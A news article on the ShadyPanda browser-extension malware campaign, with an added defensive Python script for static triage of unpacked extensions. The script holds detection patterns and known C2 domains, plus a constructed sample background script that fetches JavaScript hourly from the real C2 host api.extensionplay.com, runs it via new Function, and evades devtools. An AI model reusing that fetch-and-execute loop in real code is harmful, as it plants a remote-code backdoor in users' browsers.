A seven-year malicious browser extension campaign infected 4.3 million Google Chrome and Microsoft Edge users with malware, including backdoors and spyware sending people’s data to servers in China. And, according to Koi researchers, five of the extensions with more than 4 million installs are still live in the Edge marketplace.
The attackers, a group Koi named ShadyPanda, played the long game: publishing legitimate extensions, accumulating thousands or sometimes millions of downloads over several years, and then pushing a malware-laden update that auto-updates across the entire user base.
Because both marketplaces review extensions upon submission – it’s not an ongoing process – these seemingly stellar productivity tools, some with Featured and Verified status alongside glowing user reviews and high install counts, were allowed to track people’s behavior and steal sensitive info silently for years.
“No phishing. No social engineering. Just trusted extensions with quiet version bumps that turned productivity tools into surveillance platforms,” the threat hunting team said in a Monday blog.
Microsoft did not respond to The Register‘s requests for comment. A Google spokesperson confirmed none of the extensions are available on the Chrome Web Store, and we are aware that Google screens every single update to extensions in the Chrome store, no matter how minor the change.
Koi tracked ShadyPanda's activity in multiple phases, and says two campaigns are still active.
One of these campaigns included five extensions that infected 300,000 users with a backdoor enabling remote code execution. Three of the five were uploaded between 2018 and 2019 and achieved Featured and Verified status. One of those extensions, called Clean Master and published by Starlab Technology, has more than 200,000 installs.
In mid-2024, after being downloaded more than 300,000 times, ShadyPanda pushed a malicious update containing a backdoor across all five running on Chrome and Edge. While the extensions have since been removed from both marketplaces, “the infrastructure for full-scale attacks remains deployed on all infected browsers,” the researchers wrote.
The malware allows complete browser surveillance, checking api.extensionplay[.]com for new instructions every hour, downloading arbitrary JavaScript, and executing it with full browser API access. It can also inject malicious content into any website, including HTTPS connections.
Clean Master then sends all of this stolen data – every URL visited, HTTP referrers showing navigation patterns, timestamps for activity profiling, persistent UUID4 identifiers, and complete browser fingerprints – to ShadyPanda-controlled servers.
Plus, the malware contains anti-analysis capabilities and switches to benign behavior if a researcher opens developer tools.
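The behaviour described in the three paragraphs above (an hourly check-in with a remote host, arbitrary JavaScript fetched and run with extension privileges, broad URL and cookie permissions, and developer-tools evasion) is something a defender can triage statically from an unpacked extension directory. The script below is an added example written for this article; it is not Koi's tooling or code from any of the extensions named. It reads the manifest, greps the JavaScript for the patterns that make up that shape, lists the domains the code contacts, and scores the combination. It is a heuristic for prioritising human review, not proof of malice, and the sample extension it builds in a temp directory is constructed for the demonstration; the only real indicator it knows is the C2 hostname the article gives (api.extensionplay[.]com) plus the trovi.com redirect domain mentioned later in the piece.

```python
"""
Static triage of an unpacked browser extension for the ShadyPanda shape:
broad host/cookie permissions, a periodic beacon to a remote host, remote
JavaScript executed with extension privileges, devtools evasion and page
injection. Heuristic only: it flags code for human review.
"""
import json
import re
import tempfile
from pathlib import Path

# Permissions that let an extension see or alter every site the user visits.
BROAD_PERMISSIONS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*",
                     "cookies", "webRequest", "webRequestBlocking",
                     "scripting", "tabs", "history", "webNavigation"}

# Source patterns, each paired with the behaviour it suggests.
CODE_PATTERNS = {
    "dynamic_code_execution": re.compile(r"\beval\s*\(|new\s+Function\s*\(|executeScript\s*\("),
    "periodic_beacon": re.compile(r"setInterval\s*\(|chrome\.alarms\.create\s*\("),
    "remote_fetch": re.compile(r"\bfetch\s*\(|XMLHttpRequest|\.open\s*\(\s*['\"](?:GET|POST)"),
    "devtools_evasion": re.compile(r"outerWidth\s*-\s*(?:window\.)?innerWidth|\bdebugger\b|devtools"),
    "page_injection": re.compile(r"createElement\s*\(\s*['\"]script['\"]|insertAdjacentHTML|\.innerHTML\s*="),
}

URL_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)

# Domains the article attributes to ShadyPanda infrastructure (defanged there).
KNOWN_BAD_DOMAINS = {"api.extensionplay.com", "trovi.com"}


def load_permissions(manifest: dict) -> set[str]:
    """Collect declared permissions across MV2 and MV3 manifest layouts."""
    perms = set(manifest.get("permissions", []))
    perms |= set(manifest.get("host_permissions", []))  # MV3 keeps hosts separately
    perms |= set(manifest.get("optional_permissions", []))
    for cs in manifest.get("content_scripts", []):
        perms |= set(cs.get("matches", []))
    return perms


def audit_extension(ext_dir: Path) -> dict:
    """Return findings for one unpacked extension directory."""
    manifest = json.loads((ext_dir / "manifest.json").read_text())
    perms = load_permissions(manifest)
    report = {
        "name": manifest.get("name", "?"),
        "version": manifest.get("version", "?"),
        "broad_permissions": sorted(perms & BROAD_PERMISSIONS),
        "behaviours": {},  # pattern label -> list of "file:line"
        "domains": set(),
    }
    for js in ext_dir.rglob("*.js"):
        rel = js.relative_to(ext_dir).as_posix()
        for lineno, line in enumerate(js.read_text(errors="replace").splitlines(), 1):
            for label, rx in CODE_PATTERNS.items():
                if rx.search(line):
                    report["behaviours"].setdefault(label, []).append(f"{rel}:{lineno}")
            for host in URL_RE.findall(line):
                report["domains"].add(host.lower())
    report["known_bad_domains"] = report["domains"] & KNOWN_BAD_DOMAINS
    return report


def risk_score(report: dict) -> int:
    """Crude additive score: broad reach plus a beacon plus remote code
    execution is the update-and-weaponise shape the article describes."""
    score = len(report["broad_permissions"])
    b = report["behaviours"]
    if "periodic_beacon" in b and "remote_fetch" in b:
        score += 3
    if "dynamic_code_execution" in b:
        score += 3
    if "devtools_evasion" in b:
        score += 2
    if "page_injection" in b:
        score += 1
    score += 5 * len(report["known_bad_domains"])
    return score


# Constructed sample (not a real extension): an MV2 background page whose
# loop mimics the hourly fetch-and-run behaviour the article attributes to
# Clean Master, so the audit has something to find.
SAMPLE_MANIFEST = {
    "manifest_version": 2, "name": "Sample Cleaner (constructed)", "version": "2.1.0",
    "permissions": ["cookies", "tabs", "<all_urls>", "alarms"],
    "background": {"scripts": ["bg.js"]},
}
SAMPLE_BACKGROUND_JS = """\
// constructed for the example; not code from any real extension
chrome.alarms.create('tick', { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(async () => {
  if (window.outerWidth - window.innerWidth > 160) return; // devtools open? stay quiet
  const r = await fetch('https://api.extensionplay.com/task');
  new Function(await r.text())();
});
"""


def build_sample_extension(root: Path) -> Path:
    """Write the constructed sample extension under root and return its path."""
    ext = root / "sample_ext"
    ext.mkdir(parents=True, exist_ok=True)
    (ext / "manifest.json").write_text(json.dumps(SAMPLE_MANIFEST))
    (ext / "bg.js").write_text(SAMPLE_BACKGROUND_JS)
    return ext


def audit_sample() -> tuple:
    """Build the sample in a temp dir, audit it, and return (report, score)."""
    with tempfile.TemporaryDirectory() as tmp:
        report = audit_extension(build_sample_extension(Path(tmp)))
    return report, risk_score(report)


if __name__ == "__main__":
    rep, score = audit_sample()
    print(f"{rep['name']} v{rep['version']}  risk={score}")
    print("broad permissions:", rep["broad_permissions"])
    for label, hits in rep["behaviours"].items():
        print(f"  {label}: {', '.join(hits)}")
    print("contacts:", sorted(rep["domains"]), "known bad:", sorted(rep["known_bad_domains"]))
```

Point `audit_extension` at the unpacked directory of an installed extension (Chrome keeps them under the profile's `Extensions` folder, one subdirectory per version) and diff the reports between versions: the article's point is that the malicious behaviour arrives in a later version bump, so a version whose score jumps from near zero to double digits is the one to pull apart by hand.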
An additional five extensions from the same publisher launched on Edge around 2023 and now have more than four million combined installs. According to Koi, all five are still live on the Edge marketplace, and two of these install spyware on users’ machines.
One of these five, WeTab, has three million installs. It's a surveillance platform disguised as a productivity tool that snarfs all sorts of user data: every URL visited, search queries, mouse-click tracking, browser fingerprinting, page interaction data, and storage access – and then sends all of this, in real time, to 17 different domains (8 Baidu servers in China, 7 WeTab servers in China, and Google Analytics).
“The extension already has dangerous permissions including access to all URLs and cookies, users are downloading them right now,” the researchers wrote. “ShadyPanda can push updates at any time, weaponizing 4 million browsers with the same RCE backdoor framework [from Clean Master] or something even worse.”
Koi also traced ShadyPanda to a couple of earlier, now inactive, campaigns. One of these, which occurred during 2023, included 20 Chrome Web Store extensions and 125 on Microsoft Edge, all disguised as wallpaper or productivity apps.
This one worked by silently tracking and monetizing users’ browsing data. When someone clicked on eBay, Amazon, or Booking.com, the extensions injected affiliate tracking codes and Google Analytics trackers, which were then logged and used to sell people’s website visits and search queries.
A second inactive campaign from early 2023 was also disguised as a new-tab productivity tool, called Infinity V+. It redirected every user's search to the browser-hijacking website trovi.com, exfiltrated cookies, and logged users' keystrokes in the search box, sending all of this info to external servers.
According to the researchers, all of these ShadyPanda campaigns illustrate a problem in the way marketplaces manage extensions. “They don’t watch what happens after approval,” they wrote. ®
